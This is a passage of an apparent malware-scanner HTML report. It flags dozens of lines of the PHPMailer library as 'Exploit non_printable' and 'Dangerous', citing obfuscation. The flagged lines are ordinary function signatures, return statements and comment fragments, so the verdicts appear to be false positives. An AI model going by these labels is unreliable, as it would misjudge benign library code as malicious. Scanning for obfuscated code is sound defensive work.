<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1096</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1205</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1244</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1273</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1308</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1323</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1330</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1372</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1412</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1417</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1424</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1426</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1428</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1429</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1435</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1443</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1467</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1475</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1491</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1591</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1598</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1600</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1602</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1736</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1738</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1750</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
